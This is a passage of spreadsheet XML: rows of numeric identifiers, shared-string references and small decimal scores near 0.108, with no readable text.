        <v>6667</v>
      </c>
      <c r="D7024" s="2">
        <v>1.0</v>
      </c>
      <c r="E7024" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7024" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7025" ht="15.75" customHeight="1">
      <c r="A7025" s="1">
        <v>20670.0</v>
      </c>
      <c r="B7025" s="2">
        <v>1.4389876E7</v>
      </c>
      <c r="C7025" s="2" t="s">
        <v>6668</v>
      </c>
      <c r="D7025" s="2">
        <v>1.0</v>
      </c>
      <c r="E7025" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7025" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7026" ht="15.75" customHeight="1">
      <c r="A7026" s="1">
        <v>20874.0</v>
      </c>
      <c r="B7026" s="2">
        <v>1.598811E7</v>
      </c>
      <c r="C7026" s="2" t="s">
        <v>6669</v>
      </c>
      <c r="D7026" s="2">
        <v>1.0</v>
      </c>
      <c r="E7026" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7026" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7027" ht="15.75" customHeight="1">
      <c r="A7027" s="1">
        <v>20945.0</v>
      </c>
      <c r="B7027" s="2">
        <v>1.6569755E7</v>
      </c>
      <c r="C7027" s="2" t="s">
        <v>6670</v>
      </c>
      <c r="D7027" s="2">
        <v>1.0</v>
      </c>
      <c r="E7027" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7027" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7028" ht="15.75" customHeight="1">
      <c r="A7028" s="1">
        <v>21387.0</v>
      </c>
      <c r="B7028" s="2">
        <v>2.1709503E7</v>
      </c>
      <c r="C7028" s="2" t="s">
        <v>6671</v>
      </c>
      <c r="D7028" s="2">
        <v>1.0</v>
      </c>
      <c r="E7028" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7028" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7029" ht="15.75" customHeight="1">
      <c r="A7029" s="1">
        <v>21802.0</v>
      </c>
      <c r="B7029" s="2">
        <v>2.6708798E7</v>
      </c>
      <c r="C7029" s="2" t="s">
        <v>6672</v>
      </c>
      <c r="D7029" s="2">
        <v>1.0</v>
      </c>
      <c r="E7029" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7029" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7030" ht="15.75" customHeight="1">
      <c r="A7030" s="1">
        <v>21949.0</v>
      </c>
      <c r="B7030" s="2">
        <v>2.8822788E7</v>
      </c>
      <c r="C7030" s="2" t="s">
        <v>6673</v>
      </c>
      <c r="D7030" s="2">
        <v>1.0</v>
      </c>
      <c r="E7030" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7030" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7031" ht="15.75" customHeight="1">
      <c r="A7031" s="1">
        <v>22476.0</v>
      </c>
      <c r="B7031" s="2">
        <v>3.6820723E7</v>
      </c>
      <c r="C7031" s="2" t="s">
        <v>6674</v>
      </c>
      <c r="D7031" s="2">
        <v>1.0</v>
      </c>
      <c r="E7031" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7031" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7032" ht="15.75" customHeight="1">
      <c r="A7032" s="1">
        <v>23284.0</v>
      </c>
      <c r="B7032" s="2">
        <v>5.3746168E7</v>
      </c>
      <c r="C7032" s="2" t="s">
        <v>6675</v>
      </c>
      <c r="D7032" s="2">
        <v>1.0</v>
      </c>
      <c r="E7032" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7032" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7033" ht="15.75" customHeight="1">
      <c r="A7033" s="1">
        <v>23373.0</v>
      </c>
      <c r="B7033" s="2">
        <v>5.5377932E7</v>
      </c>
      <c r="C7033" s="2" t="s">
        <v>6676</v>
      </c>
      <c r="D7033" s="2">
        <v>1.0</v>
      </c>
      <c r="E7033" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7033" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7034" ht="15.75" customHeight="1">
      <c r="A7034" s="1">
        <v>23494.0</v>
      </c>
      <c r="B7034" s="2">
        <v>5.7530161E7</v>
      </c>
      <c r="C7034" s="2" t="s">
        <v>6677</v>
      </c>
      <c r="D7034" s="2">
        <v>1.0</v>
      </c>
      <c r="E7034" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7034" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7035" ht="15.75" customHeight="1">
      <c r="A7035" s="1">
        <v>23801.0</v>
      </c>
      <c r="B7035" s="2">
        <v>7784258.0</v>
      </c>
      <c r="C7035" s="2" t="s">
        <v>6678</v>
      </c>
      <c r="D7035" s="2">
        <v>1.0</v>
      </c>
      <c r="E7035" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7035" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7036" ht="15.75" customHeight="1">
      <c r="A7036" s="1">
        <v>24249.0</v>
      </c>
      <c r="B7036" s="2">
        <v>1.0504336E7</v>
      </c>
      <c r="C7036" s="2" t="s">
        <v>6679</v>
      </c>
      <c r="D7036" s="2">
        <v>1.0</v>
      </c>
      <c r="E7036" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7036" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7037" ht="15.75" customHeight="1">
      <c r="A7037" s="1">
        <v>24417.0</v>
      </c>
      <c r="B7037" s="2">
        <v>1.0841437E7</v>
      </c>
      <c r="C7037" s="2" t="s">
        <v>6680</v>
      </c>
      <c r="D7037" s="2">
        <v>1.0</v>
      </c>
      <c r="E7037" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7037" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7038" ht="15.75" customHeight="1">
      <c r="A7038" s="1">
        <v>24546.0</v>
      </c>
      <c r="B7038" s="2">
        <v>1.1259073E7</v>
      </c>
      <c r="C7038" s="2" t="s">
        <v>6681</v>
      </c>
      <c r="D7038" s="2">
        <v>1.0</v>
      </c>
      <c r="E7038" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7038" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7039" ht="15.75" customHeight="1">
      <c r="A7039" s="1">
        <v>24963.0</v>
      </c>
      <c r="B7039" s="2">
        <v>1.2598405E7</v>
      </c>
      <c r="C7039" s="2" t="s">
        <v>6682</v>
      </c>
      <c r="D7039" s="2">
        <v>1.0</v>
      </c>
      <c r="E7039" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7039" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7040" ht="15.75" customHeight="1">
      <c r="A7040" s="1">
        <v>25807.0</v>
      </c>
      <c r="B7040" s="2">
        <v>1.4733692E7</v>
      </c>
      <c r="C7040" s="2" t="s">
        <v>6683</v>
      </c>
      <c r="D7040" s="2">
        <v>1.0</v>
      </c>
      <c r="E7040" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7040" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7041" ht="15.75" customHeight="1">
      <c r="A7041" s="1">
        <v>26310.0</v>
      </c>
      <c r="B7041" s="2">
        <v>1.6648597E7</v>
      </c>
      <c r="C7041" s="2" t="s">
        <v>6684</v>
      </c>
      <c r="D7041" s="2">
        <v>1.0</v>
      </c>
      <c r="E7041" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7041" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7042" ht="15.75" customHeight="1">
      <c r="A7042" s="1">
        <v>28486.0</v>
      </c>
      <c r="B7042" s="2">
        <v>2.6668519E7</v>
      </c>
      <c r="C7042" s="5" t="s">
        <v>6685</v>
      </c>
      <c r="D7042" s="2">
        <v>1.0</v>
      </c>
      <c r="E7042" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7042" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7043" ht="15.75" customHeight="1">
      <c r="A7043" s="1">
        <v>28502.0</v>
      </c>
      <c r="B7043" s="2">
        <v>2.6708797E7</v>
      </c>
      <c r="C7043" s="2" t="s">
        <v>6672</v>
      </c>
      <c r="D7043" s="2">
        <v>1.0</v>
      </c>
      <c r="E7043" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7043" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7044" ht="15.75" customHeight="1">
      <c r="A7044" s="1">
        <v>28630.0</v>
      </c>
      <c r="B7044" s="2">
        <v>2.7203396E7</v>
      </c>
      <c r="C7044" s="2" t="s">
        <v>6686</v>
      </c>
      <c r="D7044" s="2">
        <v>1.0</v>
      </c>
      <c r="E7044" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7044" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7045" ht="15.75" customHeight="1">
      <c r="A7045" s="1">
        <v>28824.0</v>
      </c>
      <c r="B7045" s="2">
        <v>2.8822787E7</v>
      </c>
      <c r="C7045" s="2" t="s">
        <v>6673</v>
      </c>
      <c r="D7045" s="2">
        <v>1.0</v>
      </c>
      <c r="E7045" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7045" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7046" ht="15.75" customHeight="1">
      <c r="A7046" s="1">
        <v>29537.0</v>
      </c>
      <c r="B7046" s="2">
        <v>3.283781E7</v>
      </c>
      <c r="C7046" s="2" t="s">
        <v>6687</v>
      </c>
      <c r="D7046" s="2">
        <v>1.0</v>
      </c>
      <c r="E7046" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7046" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7047" ht="15.75" customHeight="1">
      <c r="A7047" s="1">
        <v>30016.0</v>
      </c>
      <c r="B7047" s="2">
        <v>3616052.0</v>
      </c>
      <c r="C7047" s="2" t="s">
        <v>6688</v>
      </c>
      <c r="D7047" s="2">
        <v>1.0</v>
      </c>
      <c r="E7047" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7047" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7048" ht="15.75" customHeight="1">
      <c r="A7048" s="1">
        <v>30285.0</v>
      </c>
      <c r="B7048" s="2">
        <v>3.7733046E7</v>
      </c>
      <c r="C7048" s="2" t="s">
        <v>6689</v>
      </c>
      <c r="D7048" s="2">
        <v>1.0</v>
      </c>
      <c r="E7048" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7048" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7049" ht="15.75" customHeight="1">
      <c r="A7049" s="1">
        <v>30657.0</v>
      </c>
      <c r="B7049" s="2">
        <v>4.2107995E7</v>
      </c>
      <c r="C7049" s="2" t="s">
        <v>6690</v>
      </c>
      <c r="D7049" s="2">
        <v>1.0</v>
      </c>
      <c r="E7049" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7049" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7050" ht="15.75" customHeight="1">
      <c r="A7050" s="1">
        <v>31203.0</v>
      </c>
      <c r="B7050" s="2">
        <v>4922266.0</v>
      </c>
      <c r="C7050" s="2" t="s">
        <v>6691</v>
      </c>
      <c r="D7050" s="2">
        <v>1.0</v>
      </c>
      <c r="E7050" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7050" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7051" ht="15.75" customHeight="1">
      <c r="A7051" s="1">
        <v>31414.0</v>
      </c>
      <c r="B7051" s="2">
        <v>5.0091113E7</v>
      </c>
      <c r="C7051" s="2" t="s">
        <v>6692</v>
      </c>
      <c r="D7051" s="2">
        <v>1.0</v>
      </c>
      <c r="E7051" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7051" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7052" ht="15.75" customHeight="1">
      <c r="A7052" s="1">
        <v>32066.0</v>
      </c>
      <c r="B7052" s="2">
        <v>5379390.0</v>
      </c>
      <c r="C7052" s="2" t="s">
        <v>6693</v>
      </c>
      <c r="D7052" s="2">
        <v>1.0</v>
      </c>
      <c r="E7052" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7052" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7053" ht="15.75" customHeight="1">
      <c r="A7053" s="1">
        <v>32232.0</v>
      </c>
      <c r="B7053" s="2">
        <v>5.4972229E7</v>
      </c>
      <c r="C7053" s="2" t="s">
        <v>6694</v>
      </c>
      <c r="D7053" s="2">
        <v>1.0</v>
      </c>
      <c r="E7053" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7053" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7054" ht="15.75" customHeight="1">
      <c r="A7054" s="1">
        <v>32520.0</v>
      </c>
      <c r="B7054" s="2">
        <v>5727670.0</v>
      </c>
      <c r="C7054" s="2" t="s">
        <v>6695</v>
      </c>
      <c r="D7054" s="2">
        <v>1.0</v>
      </c>
      <c r="E7054" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7054" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7055" ht="15.75" customHeight="1">
      <c r="A7055" s="1">
        <v>32910.0</v>
      </c>
      <c r="B7055" s="2">
        <v>6404000.0</v>
      </c>
      <c r="C7055" s="2" t="s">
        <v>6696</v>
      </c>
      <c r="D7055" s="2">
        <v>1.0</v>
      </c>
      <c r="E7055" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7055" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7056" ht="15.75" customHeight="1">
      <c r="A7056" s="1">
        <v>32929.0</v>
      </c>
      <c r="B7056" s="2">
        <v>6429829.0</v>
      </c>
      <c r="C7056" s="2" t="s">
        <v>6697</v>
      </c>
      <c r="D7056" s="2">
        <v>1.0</v>
      </c>
      <c r="E7056" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7056" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7057" ht="15.75" customHeight="1">
      <c r="A7057" s="1">
        <v>33050.0</v>
      </c>
      <c r="B7057" s="2">
        <v>6779608.0</v>
      </c>
      <c r="C7057" s="2" t="s">
        <v>6688</v>
      </c>
      <c r="D7057" s="2">
        <v>1.0</v>
      </c>
      <c r="E7057" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7057" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7058" ht="15.75" customHeight="1">
      <c r="A7058" s="1">
        <v>33430.0</v>
      </c>
      <c r="B7058" s="2">
        <v>7784257.0</v>
      </c>
      <c r="C7058" s="2" t="s">
        <v>6678</v>
      </c>
      <c r="D7058" s="2">
        <v>1.0</v>
      </c>
      <c r="E7058" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7058" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7059" ht="15.75" customHeight="1">
      <c r="A7059" s="1">
        <v>33798.0</v>
      </c>
      <c r="B7059" s="2">
        <v>8798752.0</v>
      </c>
      <c r="C7059" s="2" t="s">
        <v>6698</v>
      </c>
      <c r="D7059" s="2">
        <v>1.0</v>
      </c>
      <c r="E7059" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7059" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7060" ht="15.75" customHeight="1">
      <c r="A7060" s="1">
        <v>33940.0</v>
      </c>
      <c r="B7060" s="2">
        <v>9288435.0</v>
      </c>
      <c r="C7060" s="2" t="s">
        <v>6699</v>
      </c>
      <c r="D7060" s="2">
        <v>1.0</v>
      </c>
      <c r="E7060" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7060" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7061" ht="15.75" customHeight="1">
      <c r="A7061" s="1">
        <v>34173.0</v>
      </c>
      <c r="B7061" s="2">
        <v>9927054.0</v>
      </c>
      <c r="C7061" s="2" t="s">
        <v>6700</v>
      </c>
      <c r="D7061" s="2">
        <v>1.0</v>
      </c>
      <c r="E7061" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7061" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7062" ht="15.75" customHeight="1">
      <c r="A7062" s="1">
        <v>22501.0</v>
      </c>
      <c r="B7062" s="2">
        <v>3.7278973E7</v>
      </c>
      <c r="C7062" s="2" t="s">
        <v>6701</v>
      </c>
      <c r="D7062" s="2">
        <v>1.0</v>
      </c>
      <c r="E7062" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7062" s="2">
        <v>0.1081871345029239</v>
      </c>
    </row>
    <row r="7063" ht="15.75" customHeight="1">
      <c r="A7063" s="1">
        <v>28845.0</v>
      </c>
      <c r="B7063" s="2">
        <v>2.8952893E7</v>
      </c>
      <c r="C7063" s="2" t="s">
        <v>6702</v>
      </c>
      <c r="D7063" s="2">
        <v>1.0</v>
      </c>
      <c r="E7063" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7063" s="2">
        <v>0.1081871345029239</v>
      </c>
    </row>
    <row r="7064" ht="15.75" customHeight="1">
      <c r="A7064" s="1">
        <v>32076.0</v>
      </c>
      <c r="B7064" s="2">
        <v>5381845.0</v>
      </c>
      <c r="C7064" s="2" t="s">
        <v>6703</v>
      </c>
      <c r="D7064" s="2">
        <v>1.0</v>
      </c>
      <c r="E7064" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7064" s="2">
        <v>0.1081871345029239</v>
      </c>
    </row>
    <row r="7065" ht="15.75" customHeight="1">
      <c r="A7065" s="1">
        <v>2242.0</v>
      </c>
      <c r="B7065" s="2">
        <v>3.2316643E7</v>
      </c>
      <c r="C7065" s="2" t="s">
        <v>6704</v>
      </c>
      <c r="D7065" s="2">
        <v>1.0</v>
      </c>
      <c r="E7065" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7065" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="7066" ht="15.75" customHeight="1">
      <c r="A7066" s="1">
        <v>2561.0</v>
      </c>
      <c r="B7066" s="2">
        <v>3.4239189E7</v>
      </c>
      <c r="C7066" s="2" t="s">
        <v>6705</v>
      </c>
      <c r="D7066" s="2">
        <v>1.0</v>
      </c>
      <c r="E7066" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7066" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="7067" ht="15.75" customHeight="1">
      <c r="A7067" s="1">
        <v>17325.0</v>
      </c>
      <c r="B7067" s="2">
        <v>4.935039E7</v>
      </c>
      <c r="C7067" s="2" t="s">
        <v>6706</v>
      </c>
      <c r="D7067" s="2">
        <v>1.0</v>
      </c>
      <c r="E7067" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7067" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="7068" ht="15.75" customHeight="1">
      <c r="A7068" s="1">
        <v>21785.0</v>
      </c>
      <c r="B7068" s="2">
        <v>2.659359E7</v>
      </c>
      <c r="C7068" s="2" t="s">
        <v>6707</v>
      </c>
      <c r="D7068" s="2">
        <v>1.0</v>
      </c>
      <c r="E7068" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7068" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="7069" ht="15.75" customHeight="1">
      <c r="A7069" s="1">
        <v>23062.0</v>
      </c>
      <c r="B7069" s="2">
        <v>5.0364444E7</v>
      </c>
      <c r="C7069" s="2" t="s">
        <v>6708</v>
      </c>
      <c r="D7069" s="2">
        <v>1.0</v>
      </c>
      <c r="E7069" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7069" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="7070" ht="15.75" customHeight="1">
      <c r="A7070" s="1">
        <v>23110.0</v>
      </c>
      <c r="B7070" s="2">
        <v>5114527.0</v>
      </c>
      <c r="C7070" s="2" t="s">
        <v>6709</v>
      </c>
      <c r="D7070" s="2">
        <v>1.0</v>
      </c>
      <c r="E7070" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7070" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="7071" ht="15.75" customHeight="1">
      <c r="A7071" s="1">
        <v>23417.0</v>
      </c>
      <c r="B7071" s="2">
        <v>5.6199579E7</v>
      </c>
      <c r="C7071" s="2" t="s">
        <v>6710</v>
      </c>
      <c r="D7071" s="2">
        <v>1.0</v>
      </c>
      <c r="E7071" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7071" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="7072" ht="15.75" customHeight="1">
      <c r="A7072" s="1">
        <v>23985.0</v>
      </c>
      <c r="B7072" s="2">
        <v>9123343.0</v>
      </c>
      <c r="C7072" s="2" t="s">
        <v>6711</v>
      </c>
      <c r="D7072" s="2">
        <v>1.0</v>
      </c>
      <c r="E7072" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7072" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="7073" ht="15.75" customHeight="1">
      <c r="A7073" s="1">
        <v>29107.0</v>
      </c>
      <c r="B7073" s="2">
        <v>3.043397E7</v>
      </c>
      <c r="C7073" s="2" t="s">
        <v>6712</v>
      </c>
      <c r="D7073" s="2">
        <v>1.0</v>
      </c>
      <c r="E7073" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7073" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="7074" ht="15.75" customHeight="1">
      <c r="A7074" s="1">
        <v>30256.0</v>
      </c>
      <c r="B7074" s="2">
        <v>3.7604252E7</v>
      </c>
      <c r="C7074" s="2" t="s">
        <v>6713</v>
      </c>
      <c r="D7074" s="2">
        <v>1.0</v>
      </c>
      <c r="E7074" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7074" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="7075" ht="15.75" customHeight="1">
      <c r="A7075" s="1">
        <v>30719.0</v>
      </c>
      <c r="B7075" s="2">
        <v>4.3399083E7</v>
      </c>
      <c r="C7075" s="2" t="s">
        <v>6714</v>
      </c>
      <c r="D7075" s="2">
        <v>1.0</v>
      </c>
      <c r="E7075" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7075" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="7076" ht="15.75" customHeight="1">
      <c r="A7076" s="1">
        <v>31456.0</v>
      </c>
      <c r="B7076" s="2">
        <v>5.0364443E7</v>
      </c>
      <c r="C7076" s="2" t="s">
        <v>6708</v>
      </c>
      <c r="D7076" s="2">
        <v>1.0</v>
      </c>
      <c r="E7076" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7076" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="7077" ht="15.75" customHeight="1">
      <c r="A7077" s="1">
        <v>33206.0</v>
      </c>
      <c r="B7077" s="2">
        <v>7187107.0</v>
      </c>
      <c r="C7077" s="2" t="s">
        <v>6715</v>
      </c>
      <c r="D7077" s="2">
        <v>1.0</v>
      </c>
      <c r="E7077" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7077" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="7078" ht="15.75" customHeight="1">
      <c r="A7078" s="1">
        <v>8924.0</v>
      </c>
      <c r="B7078" s="2">
        <v>5.4829842E7</v>
      </c>
      <c r="C7078" s="2" t="s">
        <v>6716</v>
      </c>
      <c r="D7078" s="2">
        <v>1.0</v>
      </c>
      <c r="E7078" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7078" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="7079" ht="15.75" customHeight="1">
      <c r="A7079" s="1">
        <v>20524.0</v>
      </c>
      <c r="B7079" s="2">
        <v>1.3138003E7</v>
      </c>
      <c r="C7079" s="2" t="s">
        <v>6717</v>
      </c>
      <c r="D7079" s="2">
        <v>1.0</v>
      </c>
      <c r="E7079" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7079" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="7080" ht="15.75" customHeight="1">
      <c r="A7080" s="1">
        <v>22031.0</v>
      </c>
      <c r="B7080" s="2">
        <v>3.0159552E7</v>
      </c>
      <c r="C7080" s="2" t="s">
        <v>6718</v>
      </c>
      <c r="D7080" s="2">
        <v>1.0</v>
      </c>
      <c r="E7080" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7080" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="7081" ht="15.75" customHeight="1">
      <c r="A7081" s="1">
        <v>22290.0</v>
      </c>
      <c r="B7081" s="2">
        <v>3.3504095E7</v>
      </c>
      <c r="C7081" s="2" t="s">
        <v>6719</v>
      </c>
      <c r="D7081" s="2">
        <v>1.0</v>
      </c>
      <c r="E7081" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7081" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="7082" ht="15.75" customHeight="1">
      <c r="A7082" s="1">
        <v>31523.0</v>
      </c>
      <c r="B7082" s="2">
        <v>5.0842614E7</v>
      </c>
      <c r="C7082" s="2" t="s">
        <v>6720</v>
      </c>
      <c r="D7082" s="2">
        <v>1.0</v>
      </c>
      <c r="E7082" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7082" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="7083" ht="15.75" customHeight="1">
      <c r="A7083" s="1">
        <v>33197.0</v>
      </c>
      <c r="B7083" s="2">
        <v>7162124.0</v>
      </c>
      <c r="C7083" s="2" t="s">
        <v>6721</v>
      </c>
      <c r="D7083" s="2">
        <v>1.0</v>
      </c>
      <c r="E7083" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7083" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="7084" ht="15.75" customHeight="1">
      <c r="A7084" s="1">
        <v>22367.0</v>
      </c>
      <c r="B7084" s="2">
        <v>3.494479E7</v>
      </c>
      <c r="C7084" s="2" t="s">
        <v>6722</v>
      </c>
      <c r="D7084" s="2">
        <v>1.0</v>
      </c>
      <c r="E7084" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7084" s="2">
        <v>0.108080808080808</v>
      </c>
    </row>
    <row r="7085" ht="15.75" customHeight="1">
      <c r="A7085" s="1">
        <v>23543.0</v>
      </c>
      <c r="B7085" s="2">
        <v>6006927.0</v>
      </c>
      <c r="C7085" s="2" t="s">
        <v>6723</v>
      </c>
      <c r="D7085" s="2">
        <v>1.0</v>
      </c>
      <c r="E7085" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7085" s="2">
        <v>0.108080808080808</v>
      </c>
    </row>
    <row r="7086" ht="15.75" customHeight="1">
      <c r="A7086" s="1">
        <v>3492.0</v>
      </c>
      <c r="B7086" s="2">
        <v>3.8466153E7</v>
      </c>
      <c r="C7086" s="2" t="s">
        <v>6724</v>
      </c>
      <c r="D7086" s="2">
        <v>1.0</v>
      </c>
      <c r="E7086" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7086" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="7087" ht="15.75" customHeight="1">
      <c r="A7087" s="1">
        <v>4589.0</v>
      </c>
      <c r="B7087" s="2">
        <v>4.2795419E7</v>
      </c>
      <c r="C7087" s="2" t="s">
        <v>6725</v>
      </c>
      <c r="D7087" s="2">
        <v>1.0</v>
      </c>
      <c r="E7087" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7087" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="7088" ht="15.75" customHeight="1">
      <c r="A7088" s="1">
        <v>5029.0</v>
      </c>
      <c r="B7088" s="2">
        <v>4.4244375E7</v>
      </c>
      <c r="C7088" s="2" t="s">
        <v>6726</v>
      </c>
      <c r="D7088" s="2">
        <v>1.0</v>
      </c>
      <c r="E7088" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7088" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="7089" ht="15.75" customHeight="1">
      <c r="A7089" s="1">
        <v>12141.0</v>
      </c>
      <c r="B7089" s="2">
        <v>2.7087306E7</v>
      </c>
      <c r="C7089" s="2" t="s">
        <v>6727</v>
      </c>
      <c r="D7089" s="2">
        <v>1.0</v>
      </c>
      <c r="E7089" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7089" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="7090" ht="15.75" customHeight="1">
      <c r="A7090" s="1">
        <v>19749.0</v>
      </c>
      <c r="B7090" s="2">
        <v>5.6699378E7</v>
      </c>
      <c r="C7090" s="2" t="s">
        <v>6728</v>
      </c>
      <c r="D7090" s="2">
        <v>1.0</v>
      </c>
      <c r="E7090" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7090" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="7091" ht="15.75" customHeight="1">
      <c r="A7091" s="1">
        <v>28084.0</v>
      </c>
      <c r="B7091" s="2">
        <v>2.4635431E7</v>
      </c>
      <c r="C7091" s="2" t="s">
        <v>6729</v>
      </c>
      <c r="D7091" s="2">
        <v>1.0</v>
      </c>
      <c r="E7091" s="3" t="s">
        <v>4878</v>
